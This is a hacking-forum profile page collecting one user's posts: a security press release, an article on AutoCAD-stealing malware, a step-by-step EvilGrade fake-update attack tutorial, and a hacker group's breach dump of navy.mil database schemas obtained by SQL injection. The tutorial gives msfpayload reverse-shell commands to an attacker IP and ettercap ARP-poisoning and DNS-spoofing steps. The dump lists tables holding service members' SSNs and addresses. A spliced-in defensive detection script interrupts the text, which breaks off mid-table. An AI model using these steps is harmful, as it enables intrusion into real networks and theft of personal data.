Wubi

Active Members
  • Posts: 893
  • Days Won: 17

Everything posted by Wubi

  1. [...]in Facebook applications[...] http://apps.facebook.com/[Aplicatia]/index.php/facebook/[SQLi]
     Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/[PATH]/public_html/facebook/apps/quotes/index.php on line 92
     Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/[PATH]/public_html/facebook/apps/quotes/index.php on line 103
     Seems a bit too easy.
  2. zAnti Pentester’s Worldcup tournament open for Hackers

     Today is a great day to be a security enthusiast, since Zimperium kicked off the first ever penetration testing tournament. — Welcome to the Pentester’s Worldcup!

     Zimperium, a mobile security software start-up, was founded by Itzhak “Zuk” Avraham, a world-renowned white-hat hacker, in 2011. The Pentester’s World Cup is part of Zimperium’s efforts to increase awareness about mobile security, and simultaneously enhance the security of its range of award-winning products.

     You may recall Anti, the first comprehensive penetration testing software offered on smartphones. Zimperium created a killer mobile app that is so simple to use that any technical person is able to perform a pentest on his network to get the status of which devices attached to the network are vulnerable, what ports are open, and additional information that is a must-have for anyone who cares about the safety of his network.

     Last year at DEFCON, Avraham, also known as @ihackbanme, introduced the ethical-hacking tool "Android Network Toolkit," dubbed Anti for short. At that time it was in beta, but now the new app is being released as Zimperium's ANTI, or zAnti for short.

     "We live in a dangerous mobile world today, and our goal is to significantly raise awareness about security and take steps toward securing our mobile future,” said Avraham. “The World Cup also presents an opportunity for the world’s best hackers to challenge our products and make them better. We know of several companies that changed their network configuration because of ANTI. This allows us, the users, to be safer. We're thrilled to know that ANTI raised security awareness!"

     Avraham explained, “World Cup competitors will use our zAnti penetration testing software for smartphones and perform a variety of tasks such as scanning networks, finding vulnerabilities and security holes in the networks, or even cheating. The entrants will be scored on their performances and also rewarded for finding bugs.”

     ANTI was originally developed to provide a one-click tool to perform penetration testing tasks at a reasonable price. Most features of ANTI are free.

     The winner will be awarded the “Black Card,” an entrance ticket worth $2,000 for the Black Hat event during July 25-26, and hotel accommodations in Las Vegas. The top 10 players will receive free Platinum, Gold or Silver accounts in zAnti. The top 10 researchers will receive T-shirts and wristbands to enter Zimperium’s closed event at the Las Vegas Black Hat event. Researchers who find a bug and report it to Zimperium will receive 500 points and a cool zAnti T-shirt. The reported glitch will affect the score of every participant who used it - a hacker's duel!

     The World Cup ends July 16. zAnti can be downloaded directly here. Keep an eye on the Pentester's World Cup Leaderboard. May the best hacker win!

     About Zimperium

     Zimperium Ltd. is a privately owned mobile security software start-up located in Tel Aviv, Israel. The company was founded in 2011 by Itzhak “Zuk” Avraham, a highly regarded security researcher. Zimperium has set for itself a simple goal: ensure world-class mobile security for enterprises, governments and mobile carriers. Starting out with a team of nine Ninjas using their collective Zen, Zimperium has created multiple products that secure our mobile environment against targeted hacking attempts (APT) or widespread threats (worms) with very neat 0day protection features.

     Source
  3. A virus specialized for AutoCAD, a perfect cyber espionage tool

     In recent years we have been witnessing a profound change in the nature of malware: its development for spying purposes has increased, as has its spread in both the private and government sectors. The recent case of the Flame malware has demonstrated the efficiency of a malicious agent as a gathering tool in the typical context of a state-sponsored cyber espionage attack. Events like this represent the tip of the iceberg; every day millions of malware instances infect PCs all over the world, causing serious damage related to the leak of sensitive information.

     Specific viruses are developed to target particular sectors and information; that is the case, for example, with “ACAD/Medre.A”, malware specialized in the theft of AutoCAD files. The virus was developed to steal blueprints from private companies mostly based in Peru, according to experts at the security firm ESET. The virus is able to locate AutoCAD files on infected machines and to send them via e-mail to accounts provided by two Chinese internet firms, 163.com and qq.com.

     The detected malware is written in AutoLISP, an AutoCAD scripting language. To ship the stolen data, ACAD/Medre creates a password-protected RAR file containing the blueprints and the requisite “acad.fas” file and a “.dxf” file, and sends it separately by e-mail. The .DXF file generated by ACAD/Medre contains a set of information that the recipient uses for collecting the stolen files. The password used for the RAR file is just one character, equal to “1”.

     Once they had discovered the email accounts used to transfer the stolen data, the group of researchers noticed that the inbox of each of them was full; they all turned out to be saturated with over 100,000 mails, giving an idea of the scale of the attack. The virus was detected several months ago, but only in the last weeks has an explosion in the number of infected systems been observed.

     ESET researcher Righard Zwienenberg declared: “It represents a serious case of industrial espionage.” “Every new design is sent automatically to the operator of this malware. Needless to say this can cost the legitimate owner of the intellectual property a lot of money as the cybercriminals have access to the designs even before they go into production.” “They may even have the guts to apply for patents on the product before the inventor has registered it at the patent office.”

     The malware does not limit its action to stealing AutoCAD projects; it also checks for the presence of the Outlook email client in order to steal the PST file containing contacts, calendar and emails, confirming its origin as an espionage tool. For completeness, ESET has provided a free stand-alone cleaner for the ACAD/Medre.A worm.

     Every time we speak about cyber espionage we cannot help thinking of China; however, the practice is really widespread, and the fact that the accounts are Chinese is a clue but not a certainty. It’s clear that Chinese hackers are considered specialists in cyber espionage worldwide; the case of Nortel is considered a case study for the impact of cyber espionage on the business of private companies. The Chinese government, and not only it, has for at least a decade sponsored espionage activities for stealing trade secrets, confidential information and intellectual property of various kinds. Many experts are convinced that thanks to their ability to spy they were able, through the theft and reverse engineering of products, to close the technological gap with Western industry.

     This time the Chinese authorities have demonstrated a collaborative approach, identifying and blocking the accounts used for the theft. With tens of thousands of AutoCAD blueprints leaked, the team of ESET experts promptly contacted the Chinese authorities such as the Tencent company, owners of the qq.com domain, and also the Chinese National Computer Virus Emergency Response Center; their collaboration was essential to access the accounts and block them.

     Another lesson learnt is that an efficient fight against cybercrime must be conducted with the total collaboration of all the actors involved. Only in this way is it possible to conduct an efficient immunization.

     Written By: Pierluigi Paganini
     References [source]
  4. Works on Java, AppleUpdate, Google Analytics, Skype, Blackberry and many others...

     Introduction

     We all know that hackers constantly try to obtain private information by breaking into the victim's system, or by exploiting the software installed on the system, or by other means. According to one report, more than 60% of Adobe Reader users run outdated versions, which are vulnerable to attack. By applying routine software updates, users can protect themselves: routine patches protect against already-known vulnerabilities and reduce the chances of falling "prey" to hackers. The most widely used software, such as MS Office, Adobe Flash and PDF readers (as well as browsers), is a major target for exploitation if left unpatched.

     In the past, fake updates for Firefox, IE, etc. displayed messages informing users that an updated version of a plugin or browser was available, prompting the user to update their software. For example, the page tells the user that updating Flash is urgent. Once the user installs the fake update, it downloads malicious content (e.g. the Zeus Trojan) onto the victim's computer. Similar attacks have been carried out in the past against various browsers.

     Normally, if there is an update for Firefox, the notification appears as a pop-up, not as a web page. A better way to check whether there is a new Firefox update is to go to the Help menu and select "About Firefox"; if the browser needs updating, something like "apply update" will appear. If you are not sure about your applications:
     1. Check the official site or the application's site.
     2. To check for available updates, go to Firefox Web Browser — Plugin Check & Updates.
     The URL scans your Firefox browser for updates to installed plugins and tells you whether a plugin is vulnerable or needs an update.

     Most people avoid updates, which can be annoying at times. But if we keep sensitive information on our own system, then updates are important and should be priority number one. If you think about it, how many people really pay attention to updates, the type of update, or the link they download and install it from?! Obviously, very few people are really careful and vigilant about updates. An effective way to exploit the user is to use tools such as EvilGrade.

     Before moving on to EvilGrade, let's take a look at a bash script that can automatically perform a Man in the Middle attack and exploit the user by offering a fake update. This is done by setting up a DHCP server and a web server. Once that is done, it creates an exploit using msf, waits for the victim to connect to the fake update, and then runs the exploit. Once the fake update is executed, the victim's computer is exploited, giving access to the victim's system.

     We can extract this bash script with tar zxf metasploit-fakeUpdate[v0.1.4].tar.gz and copy the 'www' folder to /var/www (cp www/* /var/www/). Next, edit metasploit-fakeupdate.sh to set the network interface, then run metasploit-fakeupdate.sh. Once these steps are done, wait for the target to connect. The commands are as follows:

         tar zxf metasploit-fakeUpdate\[v0.1.4\].tar.gz
         cd metasploit-fakeUpdate\[v0.1.4\]
         cp www/* /var/www
         ifconfig
         kate metasploit-fakeUpdate.sh
         bash metasploit-fakeUpdate.sh

     About EvilGrade:

     EvilGrade is a framework that exploits weaknesses in the auto-update services of many common software packages, and the attack it implements is one of the best examples of client-side exploitation.
     This framework tricks the system into believing that a valid update is available for the product, prompting the user to install the update, which benefits the attacker. This type of attack is somewhat difficult for an ordinary user to detect, because they see nothing suspicious and the update appears legitimate. We can use this framework in combination with DNS spoofing or a Man-in-the-Middle attack to create an update for the software. This tricks the victim into downloading the update, and in this way our malicious code gets executed.

     EvilGrade supports many well-known software products, such as Notepad, iTunes, Java plug-in, WinZip, Winamp, DAP, OpenOffices, Linkedln, Speedbit, etc. EvilGrade takes advantage of many applications because most of them verify neither the update's content nor the master update server. In effect, in this type of attack the attacker modifies the victim's DNS traffic and redirects it to other IP addresses that he controls.

     General scenario of the update process: an application starts its update process and asks the DNS server to resolve the update host (for example, update.notepadplus.com). The DNS server responds with some information. The application then fetches the file lastupdate.xml from update.app1.com and parses the update file. If it detects a new update, it installs it.

     [Figure: simple diagram of the general update process]

     You can download ISR-evilgrade from http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz

     Steps to install EvilGrade:

     Step 1: Download and extract EvilGrade: http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz . To extract it, the command is: http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz

     Step 2: Download the required Perl module if necessary and run evilgrade using the command

         $ ./evilgrade

     Note: Sometimes, while running EvilGrade, we may run into a few problems, such as the one below:

         Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.

     To fix this, run the following command in a terminal:

         cpan Data::Dump

     Before attacking the target, we may need to investigate the target application. We will need to create a fake update using EvilGrade in order to inject it into the victim's computer. To list all supported applications, use the show modules command in the console; the modules are listed below:

     In the following example I will create a malicious update for Notepad++. To configure the specified module, a simple command would be

         evilgrade>configure notepadplus

     To view the options for the selected module, use the "show options" command.

     Note: In the image, the "Virtual Host" address is important - it will be used later for the attack.

     The next step is setting the agent. The agent is nothing more than a fake update binary. We need to set the path to where it is located; we can also use a dynamically generated fake update binary, for which any Metasploit payload can be generated. We can configure the agent with any type of payload using msfpayload, for example shell_reverse_tcp. We can create the payload and use it within EvilGrade, or create a payload outside the framework.
     Method 1: To create a payload in EvilGrade, the command we use is

         evilgrade (notepadplus)>set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.75.130 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]'

     Here we set the fake update to the “windows/shell_reverse_tcp” payload, with a shell that connects back to 192.168.75.130 (the attacker's IP address) on port 1234. The <%OUT%><%OUT> tag is a special one used to detect where the output will be generated.

     Method 2: Create a payload outside EvilGrade, using msfpayload.

         [root@bt]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.75.130 LPORT=1234 X > /tmp/reverse-shell.exe

     Now we can reference this payload in EvilGrade using the following command.

         evilgrade(notepadplus)>set agent /tmp/reverse-shell.exe

     Once everything is ready, we need to start the EvilGrade server. This is done simply by issuing the START command.

     Now that the server is running, the next step is to configure the Man in the Middle attack using Ettercap. As mentioned, EvilGrade, combined with DNS spoofing or a Man in the Middle attack, can be used to trick the victim. Let's configure etter.dns.

         pico /usr/share/ettercap/etter.dns

     Here we need to change the VirtualHost address, replacing it with our own IP address, i.e., notepad-plus.sourceforge.net = attacker's IP address.

     Once it is configured, we open Ettercap, since it is a tool that works well for MITM attacks on a LAN. To open Ettercap, type this command in a terminal:

         ettercap -G

     Click Sniff -> Unified sniffing -> choose your network interface card. Here it is eth0.

     Once the network interface card is selected, activate the dns_spoof plugin by double-clicking it. This plugin can be used to redirect the victim's request to the EvilGrade server. Click Plugins -> Manage the plugins -> double-click dns_spoof.

     Now let's scan the hosts on our network. Click Hosts -> Scan for hosts.
     Once the host scan is finished, select the host list to view the hosts found on the network. The result should look similar to this:

     We also need to perform a MITM attack to intercept all data on the network. Click Mitm -> Arp poisoning -> check "Sniff remote connection".

     Before starting, there is one more important thing we should do, namely setting the target. Add the router's address to target 1 by clicking "Add to target 1" and the victim's IP address to target 2 by clicking "Add to target 2".

     Once that is done, use Netcat to listen on the port set in EvilGrade. In this case it is 1234.

     Now, wait for the victim to open Notepad++. Once it is opened, a pop-up will appear asking for an update. If the victim goes ahead with the update, you will receive their shell, from which we can exploit it.

     Conclusion:

     EvilGrade is a very powerful tool for "breaking into" a system. With the help of tools like ettercap, its lethality is increased. The framework is platform-independent, that is, the tool can "break into" any system. One protection against it can be not to update any program if the updates come over an unidentified network. The best part of this tool is that the attack is not only for Windows systems, but for any vulnerable mechanism. The only thing the attacker has to do is hack the update process of the target computer over a network. After that, game over.

     EN: InfoSec Resources – Hacking AutoUpdate by Injecting Fake Updates
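
Added example (not part of the original post, of the InfoSec Resources article, or of EvilGrade): a defender-side check for the two network traces the procedure above leaves, an update hostname resolving to a LAN address and a gateway IP re-announced with a different MAC. The log format, the sample lines and the second watched hostname are constructed for illustration; notepad-plus.sourceforge.net and 192.168.75.130 are the values used in the post.

```python
import ipaddress
from collections import defaultdict

# Update hostnames to watch. The first is the one named in the post;
# the second is a hypothetical placeholder.
UPDATE_HOSTS = {"notepad-plus.sourceforge.net", "update.example.org"}

# A public update server should never resolve into these ranges.
# (ipaddress's is_private is avoided: it also covers documentation ranges.)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

# Constructed sample logs in an assumed "time key=value ..." format.
DNS_LOG = """\
10:00:01 client=192.168.75.20 query=notepad-plus.sourceforge.net answer=203.0.113.10
10:05:42 client=192.168.75.20 query=intranet.example.com answer=192.168.75.5
10:07:13 client=192.168.75.20 query=notepad-plus.sourceforge.net answer=192.168.75.130
"""
ARP_LOG = """\
10:00:00 ip=192.168.75.1 mac=00:11:22:33:44:55
10:00:00 ip=192.168.75.130 mac=de:ad:be:ef:00:01
10:06:59 ip=192.168.75.1 mac=de:ad:be:ef:00:01
"""


def parse(log):
    """Turn 'time k=v k=v' lines into dicts; skip blank or malformed lines."""
    rows = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        fields = dict(p.split("=", 1) for p in parts[1:] if "=" in p)
        fields["time"] = parts[0]
        rows.append(fields)
    return rows


def is_internal(addr):
    """True if addr parses as an IP inside one of INTERNAL_NETS."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in INTERNAL_NETS)


def spoofed_update_answers(dns_rows):
    """Watched update hosts that resolved to an internal address."""
    return [(r["time"], r["query"], r["answer"]) for r in dns_rows
            if r.get("query", "").lower().rstrip(".") in UPDATE_HOSTS
            and is_internal(r.get("answer", ""))]


def arp_conflicts(arp_rows):
    """IPs announced with more than one MAC, in the order the MACs appeared."""
    macs = defaultdict(list)
    for r in arp_rows:
        if "ip" in r and "mac" in r:
            mac = r["mac"].lower()
            if mac not in macs[r["ip"]]:
                macs[r["ip"]].append(mac)
    return {ip: seen for ip, seen in macs.items() if len(seen) > 1}


def correlate(dns_rows, arp_rows):
    """Rate a spoofed answer 'high' when the host it points to also took
    over another IP (for example the gateway) in the ARP observations."""
    conflicts = arp_conflicts(arp_rows)
    owner = {r["ip"]: r["mac"].lower()
             for r in arp_rows if "ip" in r and "mac" in r}
    alerts = []
    for time, host, answer in spoofed_update_answers(dns_rows):
        mac = owner.get(answer)
        hijacked = sorted(ip for ip, seen in conflicts.items()
                          if ip != answer and mac in seen[1:])
        alerts.append({"time": time, "host": host, "answer": answer,
                       "severity": "high" if hijacked else "medium",
                       "hijacked_ips": hijacked})
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse(DNS_LOG), parse(ARP_LOG)):
        print(alert)
```

The internal-address test only makes sense for update hosts that are expected to be public; an organisation that mirrors updates internally would compare answers against its own known-good addresses instead.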
  5. It sounds as if you came here because you no longer have anything to play CS on. Welcome anyway.
  6. Credits: Digital Corruption [ / s3lf-d3struct / Bw0mp / s0lar / 3piC / Vapor / ]

     #[x] RM'D YOUR SERVERS, UMAD?

     say("#FreeTriCk #FreeMLT #FreePhantom");
     say("Knowledge is power!");
     say("NAVY.MIL, care to share some of your staff information?");

     OUR SITE: Digital-corruption.org
     OUR TWITTERS: @digitalcorrupt @s3lf_d3struct @bw0mp @_s0lar_
     And we want to give a special thanks to vapor @vap0rizer

     Table of Contents
     1.0 - NAVY.MIL
     2.0 - DHS.GOV
     3.0 - UA.EDU

     Navy.mil: GETTING OWNED? YES SIR!
     ~$ Target: Navy.mil
     ~$ Vulnerable subdomain: https://www.smartwebmove.navsup.navy.mil/
     ~$ Exploitable method: Blind Oracle SQLi
     I H4XX3D MY OWN BOAT? <333 FIRE THE DATABASE <333
ZIPCODE | VARCHAR2 | | ZIPCODE_EXT | VARCHAR2 | +-------------------+----------+ Database: HHG_MGR Table: NTS_EXTENSION_SHIPMENT [9 columns] +----------------------+----------+ | Column | Type | +----------------------+----------+ | DATE_OF_STORAGE | DATE | | DATE_TO_EXTENSION | DATE | | LOT_NUMBER | VARCHAR2 | | NTS_LOCATION_NUMBER | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | RESPONSIBLE_PPO | VARCHAR2 | | SERVICE_ORDER_NUMBER | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | WEIGHT | VARCHAR2 | +----------------------+----------+ Database: HHG_MGR Table: NTS_RELEASE_SHIPMENT [9 columns] +----------------------+----------+ | Column | Type | +----------------------+----------+ | DATE_OF_STORAGE | DATE | | DATE_TO_RELEASE | DATE | | LOT_NUMBER | VARCHAR2 | | NTS_LOCATION_NUMBER | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | RESPONSIBLE_PPO | VARCHAR2 | | SERVICE_ORDER_NUMBER | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | WEIGHT | VARCHAR2 | +----------------------+----------+ Database: HHG_MGR Table: NTS_SHIPMENT [65 columns] +--------------------------------+----------+ | Column | Type | +--------------------------------+----------+ | CURRENT_NTS_PRO_GEAR_WT | NUMBER | | CURRENT_NTS_STORED_WT | NUMBER | | DATE_CONVERTED_TO_MBR_EXPENSE | DATE | | DATE_NEW_APPROP_EFFECTIVE | DATE | | DATE_NTS_EXPIR_LETTER1_PRINTED | DATE | | DATE_NTS_EXPIR_LETTER2_PRINTED | DATE | | DATE_NTS_EXTENSION_AUTHORIZED | DATE | | DATE_QTRLY_STG_INVOICE_PRINTED | DATE | | ESTIMATED_NTS_REMOVAL_DATE | DATE | | ESTIMATED_PERIOD_OF_NTS | NUMBER | | FINANCE_OFFICE_CODE | VARCHAR2 | | HHG_ALT_CONTACT_NAME | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_COM | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_DSN | VARCHAR2 | | HHG_ALT_CONTACT_PHONE_EXT | VARCHAR2 | | HHG_LT_CONTACT_RELATIONSHIP | VARCHAR2 | | MBR_PERM_ADDR_CARE_OF_NAME | VARCHAR2 | | MBR_PERMANENT_ADDR_CITY | VARCHAR2 | | MBR_PERMANENT_ADDR_COUNTRY | VARCHAR2 | | MBR_PERMANENT_ADDR_PH_COM | VARCHAR2 | | MBR_PERMANENT_ADDR_PH_DSN | VARCHAR2 | | 
MBR_PERMANENT_ADDR_PHONE_EXT | VARCHAR2 | | MBR_PERMANENT_ADDR_STATE | VARCHAR2 | | MBR_PERMANENT_ADDR_STREET | VARCHAR2 | | MBR_PERMANENT_ADDR_ZIP_APO_FPO | VARCHAR2 | | MINIMUM_WEIGHT_VALUE | NUMBER | | NEW_APPROPRIATION_IDENT_CODE | VARCHAR2 | | NTS_ACTION | VARCHAR2 | | NTS_APPROPRIATION_IDENT_CODE | VARCHAR2 | | NTS_BOA_MOD_NUMBER | VARCHAR2 | | NTS_BOA_MOD_STATUS_CODE | VARCHAR2 | | NTS_BOA_NUMBER | VARCHAR2 | | NTS_CONSTR_WT_USED_INDICATOR | VARCHAR2 | | NTS_CONTRACTOR_CODE | VARCHAR2 | | NTS_ENTITLEMT_EXPIRATION_DATE | DATE | | NTS_EXT_AUTH | VARCHAR2 | | NTS_EXTENSION_AUTHORITY | VARCHAR2 | | NTS_EXTENSION_REASON | VARCHAR2 | | NTS_FEDERAL_AGENCY | VARCHAR2 | | NTS_LOT_NUMBER | VARCHAR2 | | NTS_MULT_SHIPMT_SEQ_NUM | NUMBER | | NTS_PENDING_OVERSEAS_SHIPMENT | VARCHAR2 | | NTS_PRO_GEAR_AUTHORIZED | VARCHAR2 | | NTS_RESPONSIBLE_GBLOC | VARCHAR2 | | NTS_SERVICE_ORDER_NUMBER | VARCHAR2 | | NTS_TYPE | VARCHAR2 | | NUMBER_OF_MONTHS_NTS_AUTH | NUMBER | | OLD_BOA_MOD_NUMBER | VARCHAR2 | | OLD_BOA_NUMBER | VARCHAR2 | | OLD_CONTRACTOR_CODE | VARCHAR2 | | OLD_DATE_APPROP_EFFECTIVE | DATE | | OLD_ENTITLEMT_EXPIR_DATE | DATE | | OLD_MONTHS_AUTH | NUMBER | | OLD_NTS_BOA_MOD_STATUS_CODE | VARCHAR2 | | OLD_NTS_LOT_NUMBER | VARCHAR2 | | OLD_NTS_SERVICE_ORDER_NUMBER | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | PART_OF_DEPLOYMENT_INDICATOR | VARCHAR2 | | SHIPMENT_NUMBER | NUMBER | | SPECIAL_RATE_REQUIRED | VARCHAR2 | | SPECTRANS_STG_FAC_ID | VARCHAR2 | | SPECTRANS_TCD_UPDATED | VARCHAR2 | | STG_PERIOD_BEFORE_NEW_APPROP | NUMBER | | STORAGE_FACILITY_ID | VARCHAR2 | | WGT_STORED_AT_MBR_EXPENSE | NUMBER | +--------------------------------+----------+ Database: HHG_MGR Table: ORDERS_MASTER [8 columns] +-----------------------+----------+ | Column | Type | +-----------------------+----------+ | MBR_OSK | NUMBER | | MEMB_FIRST_NAME | VARCHAR2 | | MEMB_LAST_NAME | VARCHAR2 | | MEMB_MID_NAME_OR_INIT | VARCHAR2 | | MEMB_SSN | VARCHAR2 | | OLD_ORDERS_NUMBER | VARCHAR2 | | 
ORDERS_NUMBER | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | +-----------------------+----------+ Database: HHG_MGR Table: PERSONNEL [18 columns] +-----------------------+----------+ | Column | Type | +-----------------------+----------+ | ALT_DSN | VARCHAR2 | | ALT_PHONE | VARCHAR2 | | ALT_PHONE_EXT | VARCHAR2 | | DSN | VARCHAR2 | | EFFECTIVE_DATE | DATE | | EFFECTIVE_DELETE_DATE | DATE | | EMAIL | VARCHAR2 | | FAX | VARCHAR2 | | FIRST_NAME | VARCHAR2 | | INITIALS | VARCHAR2 | | LAST_NAME | VARCHAR2 | | MID_NAME_OR_INIT | VARCHAR2 | | PROCESSING_CENTER | VARCHAR2 | | SUPERVISOR_ID | VARCHAR2 | | TEAM_ID | VARCHAR2 | | USERNAME | VARCHAR2 | | WORK_PHONE | VARCHAR2 | | WORK_PHONE_EXT | VARCHAR2 | +-----------------------+----------+ Database: HHG_MGR Table: POINT_OF_CONTACT [14 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | CITY | VARCHAR2 | | CONTACT_NAME | VARCHAR2 | | CONTACT_TYPE | VARCHAR2 | | COUNTRY | VARCHAR2 | | DSN | VARCHAR2 | | DUPLICATE | CHAR | | MEMB_SSN | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | PHONE | VARCHAR2 | | PHONE_EXT | VARCHAR2 | | STATE | VARCHAR2 | | STREET_ADDRESS | VARCHAR2 | | ZIPCODE | VARCHAR2 | | ZIPCODE_EXT | VARCHAR2 | +-------------------+----------+ Database: HHG_MGR Table: POV [9 columns] +----------------------------+----------+ | Column | Type | +----------------------------+----------+ | IS_POV_DRIVABLE | VARCHAR2 | | ORDERS_SERIAL_KEY | NUMBER | | POV_IDENTIFICATION_NUMBER | VARCHAR2 | | POV_LICENSE_NUMBER | VARCHAR2 | | POV_LICENSE_STATE_OF_ISSUE | VARCHAR2 | | POV_MAKE | VARCHAR2 | | POV_MODEL | VARCHAR2 | | POV_YEAR | NUMBER | | SHIPMENT_NUMBER | NUMBER | +----------------------------+----------+ Database: HHG_MGR Table: PPCIG_CUSTOMS_CLEARANCE [5 columns] +-------------------+--------+ | Column | Type | +-------------------+--------+ | CUSTOMS_ID | NUMBER | | DD1434 | CLOB | | GENERAL_INS | CLOB | | INTRATHEATER_SHIP | CLOB | | PERSONAL_PROPERTY | CLOB | 
+-------------------+--------+ Database: HHG_MGR Table: PPCIG_CUSTOMS_CLEARANCE_SPEC [3 columns] +--------------+----------+ | Column | Type | +--------------+----------+ | CUSTOMS_ID | NUMBER | | INSTRUCTIONS | CLOB | | SUBJECT | VARCHAR2 | +--------------+----------+ Database: HHG_MGR Table: PPCIG_ELECTRICAL_EQUIPMENT [5 columns] +---------------+--------+ | Column | Type | +---------------+--------+ | ELECTRICAL_ID | NUMBER | | HOME_PC | CLOB | | OTHER | CLOB | | RADIO | CLOB | | TVS | CLOB | +---------------+--------+ Database: HHG_MGR Table: PPCIG_ELECTRIC_EQUIPMENT_SPEC [4 columns] +---------------+----------+ | Column | Type | +---------------+----------+ | ELECTRICAL_ID | NUMBER | | GBLOC | VARCHAR2 | | INSTRUCTIONS | CLOB | | SUBJECT | VARCHAR2 | +---------------+----------+ Database: HHG_MGR Table: PPCIG_FIREARMS [6 columns] +-------------+--------+ | Column | Type | +-------------+--------+ | FIREARMS_ID | NUMBER | | GENERAL_INS | CLOB | | HANDGUNS | CLOB | | OTHER | CLOB | | RIFLES | CLOB | | TOY_GUNS | CLOB | +-------------+--------+ Database: HHG_MGR Table: PPCIG_POV [15 columns] +----------------------+--------+ | Column | Type | +----------------------+--------+ | CONSIGNMENT | CLOB | | DOCUMENTATION | CLOB | | GASOLINE_INS | CLOB | | GENERAL_INS | CLOB | | INSURANCE_INS | CLOB | | MODIFIED_VEHICLE | CLOB | | MOTORCYCLE_INS | CLOB | | OTHER | CLOB | | POV_ID | NUMBER | | REGISTRATION | CLOB | | REPAIRS | CLOB | | SAFETY_REQUIREMENTS | CLOB | | SNOW | CLOB | | VEHICLE_AVAILABILITY | CLOB | | WAIVERS | CLOB | +----------------------+--------+ Database: HHG_MGR Table: PPCIG_SERVICE_CODE [2 columns] +--------------+----------+ | Column | Type | +--------------+----------+ | DESCRIPTION | VARCHAR2 | | SERVICE_CODE | VARCHAR2 | +--------------+----------+ Database: HHG_MGR Table: PPCIG_SHIP_INSTRUCTIONS [6 columns] +---------------------+--------+ | Column | Type | +---------------------+--------+ | CONTAINER | CLOB | | GENERAL_WEIGHT_INFO | CLOB | | 
HARD_LIFT | CLOB | | OTHER | CLOB | | SHIP_INS_ID | NUMBER | | UNACCOMPANIED_BAG | CLOB | +---------------------+--------+ Database: HHG_MGR Table: PPCIG_SHIP_INSTRUCTIONS_SPEC [4 columns] +--------------+----------+ | Column | Type | +--------------+----------+ | GBLOC | VARCHAR2 | | INSTRUCTIONS | CLOB | | SHIP_INS_ID | NUMBER | | SUBJECT | VARCHAR2 | +--------------+----------+ Database: HHG_MGR Table: PPCIG_TRANSMIT_EQUIPMENT [6 columns] +-------------------+--------+ | Column | Type | +-------------------+--------+ | AMATEUR_HAM_RADIO | CLOB | | CB | CLOB | | CORDLESS_PHONE | CLOB | | DISH | CLOB | | MARS_EQUIPMENT | CLOB | | TRANSMIT_ID | NUMBER | +-------------------+--------+ Database: HHG_MGR Table: PPCIG_TRANSMIT_EQUIP_SITE_SPEC [4 columns] +--------------+----------+ | Column | Type | +--------------+----------+ | GBLOC | VARCHAR2 | | INSTRUCTIONS | CLOB | | SUBJECT | VARCHAR2 | | TRANSMIT_ID | NUMBER | +--------------+----------+ Database: HHG_MGR Table: PPM_INFO [11 columns] +---------------------------+----------+ | Column | Type | +---------------------------+----------+ | AUTH_DESTINATION_CITY | VARCHAR2 | | AUTH_DESTINATION_STATE | VARCHAR2 | | AUTH_ORIGIN_CITY | VARCHAR2 | | AUTH_ORIGIN_STATE | VARCHAR2 | | EST_SPOUSE_PRO_GEAR | NUMBER | | ESTIMATED_PRO_GEAR_WEIGHT | NUMBER | | ESTIMATED_WEIGHT | NUMBER | | MOVE_DATE | DATE | | MOVE_NUMBER | NUMBER | | ORDERS_SERIAL_KEY | NUMBER | | SHIPMENT_NUMBER | NUMBER | +---------------------------+----------+ Database: HHG_MGR Table: PROCESSING_CENTERS [8 columns] +-------------------+----------+ | Column | Type | +-------------------+----------+ | BRANCH_OF_SERVICE | VARCHAR2 | | COUNTRY_CODE | VARCHAR2 | | COUNTY_CITY_IND | VARCHAR2 | | COUNTY_CITY_NAME | VARCHAR2 | | DESCRIPTION | VARCHAR2 | | GBLOC | VARCHAR2 | | GMT_DIFFERENCE | NUMBER | | STATE | VARCHAR2 | +-------------------+----------+ Database: HHG_MGR Table: RELEASE_ITEMS [4 columns] +-------------------+----------+ | Column | Type | 
